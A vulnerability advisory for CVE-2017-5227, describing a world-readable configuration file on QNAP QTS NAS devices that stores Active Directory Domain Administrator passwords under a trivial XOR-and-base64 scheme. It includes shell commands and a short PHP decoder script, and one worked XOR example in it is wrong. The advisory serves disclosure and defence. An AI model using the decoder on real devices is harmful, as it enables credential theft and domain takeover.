扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 |
QNAP QTS Domain Privilege Escalation Vulnerability NameSensitive Data Exposure in QNAP QTS Systems AffectedQNAP QTS (NAS) all model and all versions < 4.2.4 SeverityHigh 7.9/10 ImpactCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L Vendorhttp://www.qnap.com/ Advisoryhttp://www.ush.it/team/ush/hack-qnap/qnap.txt Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) Guido "go" Oricchio (g.oricchio AT pcego DOT com) Date20170322 I. BACKGROUND QNAP Systems, founded in 2004, provides network attached storage (NAS) and network video recorder (NVR) solutions for home and business use to the global market. QNAP also delivers a cloud service, called myQNAPcloud, that allows users to access and manage the devices from anywhere. QTS is a QNAP devices proprietary firmware based on Linux. ISGroup (http://www.isgroup.biz/) is an Italian Information Security boutique, we found this 0day issue while supporting Guido Oricchio of PCego, a System Integrator, to secure a QNAP product for one of his customer. Responsible disclosure with Qnap: we contacted qnap on public security@ contact and we escalate fast to their Security Researcher Myron Su on PGP emails. Prior vulnerabilities in QNAP: https://www.qnap.com/en/support/con_show.php?op=showone&cid=41 Information to customers of the vulnerability is shown in their bulletin ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113): QTS 4.2.4 Build 20170313 includes security fixes for the following vulnerabilities: Configuration file vulnerability (CVE-2017-5227) reported by Pasquale Fiorillo of the cyber security company ISGroup (www.isgroup.biz), a cyber security company, and Guido Oricchio of PCego (www.pcego.com), a system integrator. The latest version of the software at the time of writing can be obtained from: https://www.qnap.com/en-us/product_x_down/ https://start.qnap.com/en/index.php https://www.qnap.com/ II. DESCRIPTION The vulnerability allows a local QTS admin user, or other low privileged user, to access configuration file that includes a bad crypted Microsoft Domain Administrator password if the NAS was joined to a Microsoft Active Directory domain. The affected component is the "uLinux.conf" configuration file, created with a world-readable permission used to store a Domain Administrator password. Admin user can access the file using ssh that is enabled by default. Other users are not allowed to login, so they have to exploit a component, such as a web application, to run arbitrary command or arbitrary file read. TLDR: Anyone is able to read uLinux.conf file, world readable by default, can escalate to Domain Administrator if a NAS is a domain member. III. ANALYSIS QNAP QTS stores "uLinux.conf" configuration file in a directory accessible by "nobody" and with permission that make them readable by "nobody". If the NAS was joined to an Active Directory, such file contain a Domain Administrator user and password in an easily decrypt format. In older versions of QTS the Domain Admin's password was stored in plaintext. A) Config file readable by "nobody" [~] # ls -l /etc/config/uLinux.conf -rw-r--r--1 adminadminist7312 Dec 10 06:39 /etc/config/uLinux.conf Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, TS-469L, and TS-221. Access to the needed file are guaranteed to all the local users, such as httpdusr used to running web sites and web application hosted on the NAS. This expose all the information contained in the configuration file at risk and this is a violation of the principle of least privilege. https://en.wikipedia.org/wiki/Principle_of_least_privilege B) Weak encrypted password in the configuration file The Microsoft Active Directory Admin username and password are stored in the file obfuscated by a simple XOR cypher and base64 encoded. In this scenario, a Local File Read vulnerability could lead to full domain compromise given the fact that an attacker can re-use such credentials to authenticate against a Domain Controller with maximum privileges. The password field in the uLinux.conf has the following format: User = <username> Password = <base64> eg: User = Administrator Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== The "<base64>" decoded is: sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C 0000000003 03 00 00 01 01 06 0607 07 04 04 23 23 20 20|............##| 0000001021 21 26 26 27 27 24 2443 |!!&&''$$C| 00000019 Each byte xored with \x62 is the hex ascii code of the plaintext char. Eg: \x03 ^ \x62 = \x61 (a) \x00 ^ \x62 = \x61 (b) ... \x24 ^ \x62 = \x46 (F) \x43 ^ \x62 = \x21 (!) The plaintext password is: aabbccddeeffAABBCCDDEEFF! IV. EXPLOIT The following code can be used to decode the password: #!/usr/bin/php <?php $plaintext = str_split(base64_decode($argv[1])); foreach($plaintext as $chr) { echo chr(ord($chr)^0x62); } echo "\n"; Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== aabbccddeeffAABBCCDDEEFF! V. VENDOR RESPONSE Vendor released QTS 4.2.4 Build 20170313 that contains the proper security patch. At the time of this writing an official patch is currently available. VI. CVE INFORMATION Mitre assigned the CVE-2017-5227 for this vulnerability, internally to Qnap it's referred as Case NAS-201703-21. VII. DISCLOSURE TIMELINE 20161212 Bug discovered 20170106 Request for CVE to Mitre 20170106 Disclosure to security@qnap.com 20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!) 20170107 Details disclosure to Myron Su 20170109 Got CVE-CVE-2017-5227 from cve-assign 20170110 Myron Su confirm the vulnerability 20170203 We asks for updates, no release date from vendor 20170215 We extend the disclosure date as 28 Feb will not be met 20170321 QNAP releases the QTS 4.2.4 Build 20170313 20170322 Advisory disclosed to the public VIII. REFERENCES [1] Top 10 2013-A6-Sensitive Data Exposure https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure [2] Access Control Cheat Sheet https://www.owasp.org/index.php/Access_Control_Cheat_Sheet [3] https://forum.qnap.com/viewtopic.php?t=68317 20121213 User reporting that the password was stored in plaintext in a world-readable file [4] https://www.qnap.com/en/support/con_show.php?cid=113 Qnap Security Bullettin NAS-201703-21 IX. CREDIT Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the discovery of this vulnerability. Pasquale "sid" Fiorillo web site: http://www.pasqualefiorillo.it/ mail: sid AT ush DOT it Guido "go" Oricchio web site: http://www.pcego.com/ mail: g.oricchio AT pcego DOT com X. LEGAL NOTICES Copyright (c) 2017 Pasquale "sid" Fiorillo Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. |
体验盒子
